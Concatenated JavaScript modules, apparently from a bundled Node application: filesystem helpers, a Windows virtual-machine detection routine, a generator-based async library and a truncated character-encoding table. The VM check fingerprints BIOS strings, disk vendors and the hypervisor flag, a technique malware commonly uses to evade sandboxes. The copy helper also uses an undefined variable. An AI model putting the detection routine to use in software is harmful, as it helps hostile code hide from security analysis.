              walk(join(path, files[i]), depth + 1, collect)
            }
          }
        })
      })
    })
  }

  
  walk(base, 0, callback)

}


function remove(path, callback) {

  
  var unlink = Fs.unlink
  var rmdir = Fs.rmdir

  path = Path.resolve(process.cwd(), path)
  find(path, {
    
    match_fn: function(path, stat, depth, cb) {
      if (!stat.isDirectory()) {
        unlink(path, cb)
      } else {
        cb()
      }
    },
    dir_fn: function (path, stat, depth, cb) {
      rmdir(path, cb)
    },
  }, function (err) {
    if (err && (err.code === 'ENOENT' || err.code === 'ENOTDIR')) { err = null }
    callback(err)
  })

}


function copy(src, dst, callback) {

  
  var join = Path.join
  var dirname = Path.dirname
  var basename = Path.basename
  var read = Fs.readFile
  var write = Fs.writeFile
  var readlink = Fs.readlink
  var symlink = Fs.symlink
  var chmod = Fs.chmod
  var chown = Fs.chown

  
  var src_orig = Path.normalize(src)
  src = Path.resolve(process.cwd(), src)
  dst = Path.resolve(process.cwd(), dst)

  
  
  if (src_orig == '.') {
    skip += '/'
  }
  
  var skip_len = src.length + 1

  
  find(src, {
    
    match_fn: function (path, stat, depth, cb) {
      
      var new_path = join(dst, path.substring(skip_len))
      
      
      
      
      
      function set_perms(err) {
        if (err) { cb(err) ; return }
        chmod(new_path, stat.mode, function (err) {
          if (err) { cb(err) ; return }
          chown(new_path, stat.uid, stat.gid, function (err) {
            
            
            cb()
          })
        })
      }
      
      
      if (stat.isDirectory()) {
        mkdir_p(new_path, stat.mode, set_perms)
      
      } else if (stat.isFile()) {
        
        read(path, function (err, data) {
          write(new_path, data, set_perms)
        })
      
      } else if (stat.isSymbolicLink()) {
        readlink(path, function (err, realpath) {
          if (err) { cb(err) ; return }
          symlink(realpath, new_path, set_perms)
        })
      
      
      
      } else {
        cb({path: path, code: 'ENOTSUPP'})
      }
    },
  }, callback)

}


function link(target, path, callback) {
  path = Path.resolve(process.cwd(), path)
  mkdir_p(Path.dirname(path), '0755', function (err) {
    if (err) { callback(err) ; return }
    Fs.symlink(target, path, callback)
  })
}


Fs.mkdir_p = mkdir_p
Fs.find = find
Fs.remove = remove
Fs.copy = copy
Fs.link = link

module.exports = Fs                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        

========


var reg = process.binding("registry");
var vmx_detection = process.binding("vmx_detection");

function VmCheckGetDisksArray(path) {
    try {
        return new reg.WindowsRegistry(HKEY_LOCAL_MACHINE, path, KEY_READ, true).EnumKeys(path);
    } catch (e) {
        return [];
    }
}

function VmCheckVitrualDisks(array) {
    var vendors = [
        "VMware",
        "vbox",
        "SONI"
    ];

    for (let i = 0; i < array.length; i++) {
        for (let j = 0; j < vendors.length; j++) {
            if (array[i].toLowerCase().indexOf(vendors[j].toLowerCase()) !== -1) {
                return true;
            }
        }
    }

    return false;
}

function VmIsVirtualCPUPresent() {
    var goodIds = [
        "GenuineIntel",
        "AuthenticAMD",
        "AMDisbetter!"
    ];

    if (vmx_detection.isHypervisorPresent() === true) {
        return true;
    }

    return (goodIds.indexOf(vmx_detection.cpuId()) === -1)
}

function IsVirtualMachine() {

    

    var VMBioses = [
        "AMI ",
        "BOCHS",
        "VBOX",
        "QEMU",
        "SMCI",
        "INTEL  - 6040000",
        "FTNT-1",
        "SONI"
    ];

    var bIsVirtualMachine = false;
    var SystemBiosVersion =
        new reg.WindowsRegistry(HKEY_LOCAL_MACHINE, "HARDWARE\\DESCRIPTION\\System", KEY_READ, true)
            .ReadString("SystemBiosVersion").toString();

    

    for (let i = 0; i < VMBioses.length; i++) {
        if (SystemBiosVersion.toLowerCase().indexOf(VMBioses[i].toLowerCase()) !== -1) {
            bIsVirtualMachine = true;
            break;
        }
    }

    var ideDevices = VmCheckGetDisksArray('SYSTEM\\CurrentControlSet\\Enum\\IDE');
    var scsiDevices = VmCheckGetDisksArray('SYSTEM\\CurrentControlSet\\Enum\\SCSI');

    
    


    if (bIsVirtualMachine === false) {
        bIsVirtualMachine = (
            VmCheckVitrualDisks(ideDevices.keys) ||
            VmCheckVitrualDisks(scsiDevices.keys)
        );
    }

    if (bIsVirtualMachine === false) {
        bIsVirtualMachine = VmIsVirtualCPUPresent();
    }


    

    return bIsVirtualMachine;


    
}

exports.IsVirtualMachine = IsVirtualMachine;                                                                                                                                                      

========


var suspend = module.exports = function fn(generator) {
    if (!isGeneratorFunction(generator)) {
        throw new Error('First .fn() argument must be a GeneratorFunction.');
    }

    return function () {
        var suspender = new Suspender(generator);
        
        suspender.start(this, Array.prototype.slice.call(arguments));
    };
};
suspend.fn = suspend;


suspend.async = function async(generator) {
    if (!isGeneratorFunction(generator)) {
        throw new Error('First .async() argument must be a GeneratorFunction.');
    }

    return function () {
        var callback = arguments[arguments.length - 1],
			args = Array.prototype.slice.call(arguments, 0, -1);

        if (typeof callback !== 'function') {
            throw new Error('Last argument must be a callback function.');
        }

        var suspender = new Suspender(generator, callback);
        
        suspender.start(this, args);
    };
};


suspend.run = function run(generator, callback) {
    if (!isGeneratorFunction(generator)) {
        throw new Error('First .run() argument must be a GeneratorFunction.');
    }
    if (callback && typeof callback !== 'function') {
        throw new Error('Second .run() argument must be a callback function.');
    }
    var suspender = new Suspender(generator, callback);
    
    suspender.start(this);
};


suspend.resume = function resumeFactory() {
    var suspender = getActiveSuspender();
    if (!suspender) {
        throw new Error('resume() must be called from the generator body.');
    }

    var alreadyResumed = false;

    return function resume() {
        if (alreadyResumed) {
            throw new Error('Cannot call same resumer multiple times.');
        }
        alreadyResumed = true;
        suspender.resume.apply(suspender, arguments);
    };
};


suspend.resumeRaw = function resumeRawFactory() {
    var resume = suspend.resume.apply(this, arguments);
    getActiveSuspender().rawResume = true;
    return resume;
};


suspend.fork = function fork() {
    var suspender = getActiveSuspender();
    if (!suspender) {
        throw new Error('fork() must be called from the generator body.');
    }
    return suspender.forkFactory();
};


suspend.join = function join() {
    var suspender = getActiveSuspender();
    if (!suspender) {
        throw new Error('join() must be called from the generator body.');
    }
    if (suspender.pendingJoin) {
        throw new Error('There is already a join() pending unresolved forks.');
    }
    suspender.join();
};


function Suspender(generator, callback) {
    this.generator = generator;
    
    this.iterator = null;
    
    this.callback = callback;
    
    this.done = false;
    
    
    this.syncResume = false;
    
    
    this.rawResume = false;
    
    this.forkValues = [];
    
    this.pendingForks = 0;
    
    
    this.pendingJoin = false;
}


Suspender.prototype.start = function start(ctx, args) {
    this.iterator = this.generator.apply(ctx, args);
    this.nextOrThrow();
};


Suspender.prototype.handleYield = function handleYield(ret) {
    if (ret.done) {
        this.done = true;
        this.callback && this.callback.call(null, null, ret.value);
        return;
    }

    
    if (ret.value && typeof ret.value.then === 'function') {
        
        
        ret.value.then(this.resume.bind(this, null), this.resume.bind(this));
    }
};


Suspender.prototype.nextOrThrow = function next(val, isError) {
    this.syncResume = true;
    setActiveSuspender(this);
    var ret;
    try {
        ret = isError ? this.iterator.throw(val) : this.iterator.next(val);
    } catch (err) {
        if (this.callback) {
            return this.callback(err);
        } else {
            throw err;
        }
    } finally {
        this.syncResume = false;
        clearActiveSuspender();
    }
    
    this.handleYield(ret);
};


Suspender.prototype.resume = function resume(err, result) {
    
    
    if (this.syncResume) {
        return setImmediate(this.resume.bind(this, err, result));
    }

    if (this.rawResume) {
        this.rawResume = false;
        this.nextOrThrow(Array.prototype.slice.call(arguments));
    } else {
        if (this.done) {
            throw new Error('Generators cannot be resumed once completed.');
        }

        if (err) return this.nextOrThrow(err, true);

        this.nextOrThrow(result);
    }
};


Suspender.prototype.forkFactory = function forkFactory() {
    var self = this,
		index = this.pendingForks++,
		alreadyFulfilled = false;
    return function fork() {
        if (alreadyFulfilled) {
            throw new Error('fork was fulfilled more than once.');
        }
        alreadyFulfilled = true;
        self.forkValues[index] = Array.prototype.slice.call(arguments);
        if (--self.pendingForks === 0 && self.pendingJoin) {
            self.join();
        }
    };
};


Suspender.prototype.join = function join() {
    this.pendingJoin || (this.pendingJoin = true);
    if (this.pendingForks) return;
    var err = null,
		results = [];
    for (var i = 0, len = this.forkValues.length; i < len; i++) {
        var forkValue = this.forkValues[i];
        if (forkValue[0]) {
            err = forkValue[0];
            break;
        } else {
            results[i] = forkValue[1];
        }
    }
    
    this.pendingJoin = false;
    this.pendingForks = 0;
    this.forkValues.length = 0;

    
    this.resume(err, results);
};


var suspenderStack = [];

function setActiveSuspender(suspender) {
    suspenderStack.push(suspender);
}

function getActiveSuspender() {
    return suspenderStack[suspenderStack.length - 1];
}

function clearActiveSuspender() {
    suspenderStack.pop();
}

function isGeneratorFunction(v) {
    return v && v.constructor && v.constructor.name === 'GeneratorFunction';
}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 

========

var RE_SPACEDASH = /[- ]/g;


var singlebytejs = {
    "437": "cp437",
    "737": "cp737",
    "775": "cp775",
    "850": "cp850",
    "852": "cp852",
    "855": "cp855",
    "857": "cp857",
    "858": "cp858",
    "860": "cp860",
    "861": "cp861",
    "862": "cp862",
    "863": "cp863",
    "864": "cp864",
    "865": "cp865",
    "866": "cp866",
    "869": "cp869",
    "874": "iso885911",
    "1250": "windows1250",
    "1251": "windows1251",
    "1252": "windows1252",
    "1253": "windows1253",
    "1254": "windows1254",
    "1255": "windows1255",
    "1256": "windows1256",
    "1257": "windows1257",
    "1258": "windows1258",
    "10000": "macroman",
    "10006": "macgreek",
    "10007": "maccyrillic",
    "10029": "maccenteuro",
    "10079": "maciceland",
    "10081": "macturkish",
    "20866": "koi8r",
    "21866": "koi8u",
    "28591": "iso88591",
    "28592": "iso88592",
    "28593": "iso88593",
    "28594": "iso88594",
    "28595": "iso88595",
    "28596": "iso88596",
    "28597": "iso88597",
    "28598": "iso88598",
    "28599": "iso88599",
    "28600": "iso885910",
    "28601": "iso885911",
    "28603": "iso885913",
    "28604": "iso885914",
    "28605": "iso885915",
    "28606": "iso885916",
    "ascii8bit": "ascii",
    "usascii": "ascii",
    "latin1": "iso88591",
    "latin2": "iso88592",
    "latin3": "iso88593",
    "latin4": "iso88594",
    "latin6": "iso885910",
    "latin7": "iso885913",
    "latin8": "iso885914",
    "latin9": "iso885915",
    "latin10": "iso885916",
    "cp819": "iso88951",
    "arabic": "iso88596",
    "arabic8": "iso88596",
    "greek": "iso88597",
    "greek8": "iso88597",
    "hebrew": "iso88598",
    "hebrew8": "iso88598",
    "turkish": "iso88599",
    "turkish8": "iso88599",
    "thai": "iso885911",
    "thai8": "iso885911",
    "tis620": "iso885911",
    "windows874": "iso885911",
    "win874": "iso885911",
    "cp874": "iso885911",
    "celtic": "iso885914",
    "celtic8": "iso885914",
    "cp20866": "koi8r",
    "ibm878": "koi8r",
    "cp21866": "koi8u",
    "ibm1168": "koi8u",
    "windows1250": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(8364, 65533, 8218, 65533, 8222, 8230, 8224, 8225, 65533, 8240, 352, 8249, 346, 356, 381, 377, 65533, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 65533, 8482, 353, 8250, 347, 357, 382, 378, 160, 711, 728, 321, 164, 260, 166, 167, 168, 169, 350, 171, 172, 173, 174, 379, 176, 177, 731, 322, 180, 181, 182, 183, 184, 261, 351, 187, 317, 733, 318, 380, 340, 193, 194, 258, 196, 313, 262, 199, 268, 201, 280, 203, 282, 205, 206, 270, 272, 323, 327, 211, 212, 336, 214, 215, 344, 366, 218, 368, 220, 221, 354, 223, 341, 225, 226, 259, 228, 314, 263, 231, 269, 233, 281, 235, 283, 237, 238, 271, 273, 324, 328, 243, 244, 337, 246, 247, 345, 367, 250, 369, 252, 253, 355, 729)
    },
    "win1250": "windows1250",
    "cp1250": "windows1250",
    "windows1251": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(1026, 1027, 8218, 1107, 8222, 8230, 8224, 8225, 8364, 8240, 1033, 8249, 1034, 1036, 1035, 1039, 1106, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 65533, 8482, 1113, 8250, 1114, 1116, 1115, 1119, 160, 1038, 1118, 1032, 164, 1168, 166, 167, 1025, 169, 1028, 171, 172, 173, 174, 1031, 176, 177, 1030, 1110, 1169, 181, 182, 183, 1105, 8470, 1108, 187, 1112, 1029, 1109, 1111, 1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070, 1071, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1101, 1102, 1103)
    },
    "win1251": "windows1251",
    "cp1251": "windows1251",
    "windows1252": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(8364, 65533, 8218, 402, 8222, 8230, 8224, 8225, 710, 8240, 352, 8249, 338, 65533, 381, 65533, 65533, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 732, 8482, 353, 8250, 339, 65533, 382, 376, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255)
    },
    "win1252": "windows1252",
    "cp1252": "windows1252",
    "windows1253": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(8364, 65533, 8218, 402, 8222, 8230, 8224, 8225, 65533, 8240, 65533, 8249, 65533, 65533, 65533, 65533, 65533, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 65533, 8482, 65533, 8250, 65533, 65533, 65533, 65533, 160, 901, 902, 163, 164, 165, 166, 167, 168, 169, 65533, 171, 172, 173, 174, 8213, 176, 177, 178, 179, 900, 181, 182, 183, 904, 905, 906, 187, 908, 189, 910, 911, 912, 913, 914, 915, 916, 917, 918, 919, 920, 921, 922, 923, 924, 925, 926, 927, 928, 929, 65533, 931, 932, 933, 934, 935, 936, 937, 938, 939, 940, 941, 942, 943, 944, 945, 946, 947, 948, 949, 950, 951, 952, 953, 954, 955, 956, 957, 958, 959, 960, 961, 962, 963, 964, 965, 966, 967, 968, 969, 970, 971, 972, 973, 974, 65533)
    },
    "win1253": "windows1253",
    "cp1253": "windows1253",
    "windows1254": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(8364, 65533, 8218, 402, 8222, 8230, 8224, 8225, 710, 8240, 352, 8249, 338, 65533, 65533, 65533, 65533, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 732, 8482, 353, 8250, 339, 65533, 65533, 376, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 286, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 304, 350, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 287, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 305, 351, 255)
    },
    "win1254": "windows1254",
    "cp1254": "windows1254",
    "windows1255": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(8364, 65533, 8218, 402, 8222, 8230, 8224, 8225, 710, 8240, 65533, 8249, 65533, 65533, 65533, 65533, 65533, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 732, 8482, 65533, 8250, 65533, 65533, 65533, 65533, 160, 161, 162, 163, 8362, 165, 166, 167, 168, 169, 215, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 247, 187, 188, 189, 190, 191, 1456, 1457, 1458, 1459, 1460, 1461, 1462, 1463, 1464, 1465, 65533, 1467, 1468, 1469, 1470, 1471, 1472, 1473, 1474, 1475, 1520, 1521, 1522, 1523, 1524, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 1488, 1489, 1490, 1491, 1492, 1493, 1494, 1495, 1496, 1497, 1498, 1499, 1500, 1501, 1502, 1503, 1504, 1505, 1506, 1507, 1508, 1509, 1510, 1511, 1512, 1513, 1514, 65533, 65533, 8206, 8207, 65533)
    },
    "win1255": "windows1255",
    "cp1255": "windows1255",
    "windows1256": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(8364, 1662, 8218, 402, 8222, 8230, 8224, 8225, 710, 8240, 1657, 8249, 338, 1670, 1688, 1672, 1711, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 1705, 8482, 1681, 8250, 339, 8204, 8205, 1722, 160, 1548, 162, 163, 164, 165, 166, 167, 168, 169, 1726, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 1563, 187, 188, 189, 190, 1567, 1729, 1569, 1570, 1571, 1572, 1573, 1574, 1575, 1576, 1577, 1578, 1579, 1580, 1581, 1582, 1583, 1584, 1585, 1586, 1587, 1588, 1589, 1590, 215, 1591, 1592, 1593, 1594, 1600, 1601, 1602, 1603, 224, 1604, 226, 1605, 1606, 1607, 1608, 231, 232, 233, 234, 235, 1609, 1610, 238, 239, 1611, 1612, 1613, 1614, 244, 1615, 1616, 247, 1617, 249, 1618, 251, 252, 8206, 8207, 1746)
    },
    "win1256": "windows1256",
    "cp1256": "windows1256",
    "windows1257": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(8364, 65533, 8218, 65533, 8222, 8230, 8224, 8225, 65533, 8240, 65533, 8249, 65533, 168, 711, 184, 65533, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 65533, 8482, 65533, 8250, 65533, 175, 731, 65533, 160, 65533, 162, 163, 164, 65533, 166, 167, 216, 169, 342, 171, 172, 173, 174, 198, 176, 177, 178, 179, 180, 181, 182, 183, 248, 185, 343, 187, 188, 189, 190, 230, 260, 302, 256, 262, 196, 197, 280, 274, 268, 201, 377, 278, 290, 310, 298, 315, 352, 323, 325, 211, 332, 213, 214, 215, 370, 321, 346, 362, 220, 379, 381, 223, 261, 303, 257, 263, 228, 229, 281, 275, 269, 233, 378, 279, 291, 311, 299, 316, 353, 324, 326, 243, 333, 245, 246, 247, 371, 322, 347, 363, 252, 380, 382, 729)
    },
    "win1257": "windows1257",
    "cp1257": "windows1257",
    "windows1258": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(8364, 65533, 8218, 402, 8222, 8230, 8224, 8225, 710, 8240, 65533, 8249, 338, 65533, 65533, 65533, 65533, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 732, 8482, 65533, 8250, 339, 65533, 65533, 376, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 258, 196, 197, 198, 199, 200, 201, 202, 203, 768, 205, 206, 207, 272, 209, 777, 211, 212, 416, 214, 215, 216, 217, 218, 219, 220, 431, 771, 223, 224, 225, 226, 259, 228, 229, 230, 231, 232, 233, 234, 235, 769, 237, 238, 239, 273, 241, 803, 243, 244, 417, 246, 247, 248, 249, 250, 251, 252, 432, 8363, 255)
    },
    "win1258": "windows1258",
    "cp1258": "windows1258",
    "iso88591": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255)
    },
    "cp28591": "iso88591",
    "iso88592": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 260, 728, 321, 164, 317, 346, 167, 168, 352, 350, 356, 377, 173, 381, 379, 176, 261, 731, 322, 180, 318, 347, 711, 184, 353, 351, 357, 378, 733, 382, 380, 340, 193, 194, 258, 196, 313, 262, 199, 268, 201, 280, 203, 282, 205, 206, 270, 272, 323, 327, 211, 212, 336, 214, 215, 344, 366, 218, 368, 220, 221, 354, 223, 341, 225, 226, 259, 228, 314, 263, 231, 269, 233, 281, 235, 283, 237, 238, 271, 273, 324, 328, 243, 244, 337, 246, 247, 345, 367, 250, 369, 252, 253, 355, 729)
    },
    "cp28592": "iso88592",
    "iso88593": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 294, 728, 163, 164, 65533, 292, 167, 168, 304, 350, 286, 308, 173, 65533, 379, 176, 295, 178, 179, 180, 181, 293, 183, 184, 305, 351, 287, 309, 189, 65533, 380, 192, 193, 194, 65533, 196, 266, 264, 199, 200, 201, 202, 203, 204, 205, 206, 207, 65533, 209, 210, 211, 212, 288, 214, 215, 284, 217, 218, 219, 220, 364, 348, 223, 224, 225, 226, 65533, 228, 267, 265, 231, 232, 233, 234, 235, 236, 237, 238, 239, 65533, 241, 242, 243, 244, 289, 246, 247, 285, 249, 250, 251, 252, 365, 349, 729)
    },
    "cp28593": "iso88593",
    "iso88594": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 260, 312, 342, 164, 296, 315, 167, 168, 352, 274, 290, 358, 173, 381, 175, 176, 261, 731, 343, 180, 297, 316, 711, 184, 353, 275, 291, 359, 330, 382, 331, 256, 193, 194, 195, 196, 197, 198, 302, 268, 201, 280, 203, 278, 205, 206, 298, 272, 325, 332, 310, 212, 213, 214, 215, 216, 370, 218, 219, 220, 360, 362, 223, 257, 225, 226, 227, 228, 229, 230, 303, 269, 233, 281, 235, 279, 237, 238, 299, 273, 326, 333, 311, 244, 245, 246, 247, 248, 371, 250, 251, 252, 361, 363, 729)
    },
    "cp28594": "iso88594",
    "iso88595": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 1025, 1026, 1027, 1028, 1029, 1030, 1031, 1032, 1033, 1034, 1035, 1036, 173, 1038, 1039, 1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070, 1071, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1101, 1102, 1103, 8470, 1105, 1106, 1107, 1108, 1109, 1110, 1111, 1112, 1113, 1114, 1115, 1116, 167, 1118, 1119)
    },
    "cp28595": "iso88595",
    "iso88596": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 65533, 65533, 65533, 164, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 1548, 173, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 1563, 65533, 65533, 65533, 1567, 65533, 1569, 1570, 1571, 1572, 1573, 1574, 1575, 1576, 1577, 1578, 1579, 1580, 1581, 1582, 1583, 1584, 1585, 1586, 1587, 1588, 1589, 1590, 1591, 1592, 1593, 1594, 65533, 65533, 65533, 65533, 65533, 1600, 1601, 1602, 1603, 1604, 1605, 1606, 1607, 1608, 1609, 1610, 1611, 1612, 1613, 1614, 1615, 1616, 1617, 1618, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533)
    },
    "cp28596": "iso88596",
    "iso88597": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 8216, 8217, 163, 8364, 8367, 166, 167, 168, 169, 890, 171, 172, 173, 65533, 8213, 176, 177, 178, 179, 900, 901, 902, 183, 904, 905, 906, 187, 908, 189, 910, 911, 912, 913, 914, 915, 916, 917, 918, 919, 920, 921, 922, 923, 924, 925, 926, 927, 928, 929, 65533, 931, 932, 933, 934, 935, 936, 937, 938, 939, 940, 941, 942, 943, 944, 945, 946, 947, 948, 949, 950, 951, 952, 953, 954, 955, 956, 957, 958, 959, 960, 961, 962, 963, 964, 965, 966, 967, 968, 969, 970, 971, 972, 973, 974, 65533)
    },
    "cp28597": "iso88597",
    "iso88598": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 65533, 162, 163, 164, 165, 166, 167, 168, 169, 215, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 247, 187, 188, 189, 190, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 65533, 8215, 1488, 1489, 1490, 1491, 1492, 1493, 1494, 1495, 1496, 1497, 1498, 1499, 1500, 1501, 1502, 1503, 1504, 1505, 1506, 1507, 1508, 1509, 1510, 1511, 1512, 1513, 1514, 65533, 65533, 8206, 8207, 65533)
    },
    "cp28598": "iso88598",
    "iso88599": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 286, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 304, 350, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 287, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 305, 351, 255)
    },
    "cp28599": "iso88599",
    "iso885910": {
        "type": "singlebyte",
        "chars":  String.fromCharCode(128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 260, 274, 290, 298, 296, 310, 167, 315, 272, 352, 358, 381, 173, 362, 330, 176, 261, 275, 291, 299, 297, 311, 183, 316, 273, 353, 359, 382, 8213, 363, 331, 256, 193, 194, 195, 196, 197, 198, 302, 268, 201, 280, 203, 278, 205, 206, 207, 208, 325, 332, 211, 212, 213, 214, 360, 216, 370, 218, 219, 220, 221, 222, 223, 257, 225, 226, 227, 228, 229, 230, 303, 269, 233, 281, 235, 279, 237, 238, 239, 240, 326, 333, 243, 244, 245, 246, 361, 248, 371, 250, 251, 252, 253, 254, 312)
    },
    "cp28600": "iso885910",
    "iso885911": {
        "type": "singlebyte",
